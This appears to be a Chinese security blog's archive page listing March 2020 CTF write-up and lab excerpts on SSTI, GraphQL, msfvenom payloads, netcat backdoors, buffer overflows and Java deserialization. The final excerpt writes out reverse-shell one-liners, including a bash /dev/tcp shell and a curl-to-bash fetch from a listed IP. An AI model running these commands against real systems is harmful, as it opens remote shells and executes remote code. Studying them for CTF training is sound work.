03 2020 档案

摘要:mime绕过 题目过滤了 ,且 必须包含 Firefox 如果 标头不包含 字符,Firefox会尝试猜测文件类型。 此外, 在这种情况下无效,因为Firefox仅在尝试连接` xxx 此时Firefox会猜测文件类型,无视 支持多种逗号分隔类型 Chrome 被处理为xml 支持多种逗号分隔类型 阅读全文
posted @ 2020-03-31 17:49 MustaphaMond 阅读(137) 评论(0) 推荐(0) 编辑
摘要:fuzz 初步fuzz整个网站的功能,数据传输使用JSON格式,输入点只有注册和登录,也没有测出sql注入。但是随便删掉 中属性后看到报错 ,判断出前后端是用graphql来查询api 获取信息 根据文档中 "Introspection" 的部分 获取所有的数据类型,包括用户定义的,bp没有json 阅读全文
posted @ 2020-03-31 15:35 MustaphaMond 阅读(361) 评论(0) 推荐(0) 编辑
摘要:源码 题目直接给了源码 绕过 `FILTER_VALIDATE_EMAIL RFC 822 "{{1+1}}"@domain.ltd`来达到ssti,同时要注意我们的邮箱长度要在64个字符之内。 twig ssti 文件读取 rce smtp接收邮件 因为邮箱的用户名是payload,所以正常的邮箱 阅读全文
posted @ 2020-03-31 02:46 MustaphaMond 阅读(241) 评论(0) 推荐(0) 编辑
摘要:实践内容 方法 正确使用msf编码器 是一个payload生成器和编码器 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode. 使用的可执行文件模板,payload(shellcode)就 阅读全文
posted @ 2020-03-27 14:01 MustaphaMond 阅读(612) 评论(0) 推荐(0) 编辑
摘要:fake google 随便输点什么,url来看不是php,原样回显 那很有可能是ssti了,试试 有回显,直接打个python3的payload试试 拿到flag old hack 进去后看到是tp5,题目名字又叫old attack,也没扫到源码,估计是现成的洞了。t框架有 参数可以加载模块,随 阅读全文
posted @ 2020-03-22 23:14 MustaphaMond 阅读(1332) 评论(0) 推荐(0) 编辑
摘要:实验内容 使用netcat获取主机操作Shell,cron启动 netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 其中 选项可以指定一个文件在连接后打开 Windows主机获取Kali shell kali在终端输入 ,将shell反弹给wind 阅读全文
posted @ 2020-03-15 00:46 MustaphaMond 阅读(226) 评论(0) 推荐(1) 编辑
摘要:x64与x86的区别 64位系统中,不再使用 来进行系统调用,取而代之的是 指令 x64的栈不支持push64位的立即数,必须先把常量放到寄存器里再push x64的CPU的地址为64位,但实际上只支持48位的虚拟地址空间供软件使用。虚拟地址的高16位在用户模式下总是被设置为 ,而在内核模式下全置为 阅读全文
posted @ 2020-03-12 02:17 MustaphaMond 阅读(754) 评论(0) 推荐(2) 编辑
摘要:题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "从一道题入门JAVA反序列化漏洞" "V&N公开赛2020 writeup" Java反序列化 "深入了解序列化writeObject、readObject 阅读全文
posted @ 2020-03-05 21:39 MustaphaMond 阅读(791) 评论(0) 推荐(0) 编辑
摘要:实践内容 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellcode 实践过程 直接修改程序机器指令,改变程序执行流程 知识要求 阅读全文
posted @ 2020-03-04 03:54 MustaphaMond 阅读(285) 评论(0) 推荐(0) 编辑
摘要:题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "V&N公开赛2020 writeup" httpoxy "https://httpoxy.org/" "HTTPOXY漏洞说明" 利用条件: 代码以cgi模 阅读全文
posted @ 2020-03-02 22:37 MustaphaMond 阅读(679) 评论(0) 推荐(0) 编辑
摘要:题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "V&N公开赛2020 writeup" 反弹shell 在用bash反弹失败后就放弃了。。。惭愧。作为弥补,收集一下反弹shell脚本 "反弹shell" 阅读全文
posted @ 2020-03-02 21:18 MustaphaMond 阅读(1088) 评论(0) 推荐(0) 编辑
摘要:收集一点可能用上的反弹shell命令 bash bash -i >& /dev/tcp/ip/port 0>&1 curl bash -i >& /dev/tcp/192.168.20.151/7777 0>&1 curl http://174.1.73.154/shell.txt|bash PS: 阅读全文
posted @ 2020-03-02 20:53 MustaphaMond 阅读(907) 评论(0) 推荐(2) 编辑

点击右上角即可分享
微信分享提示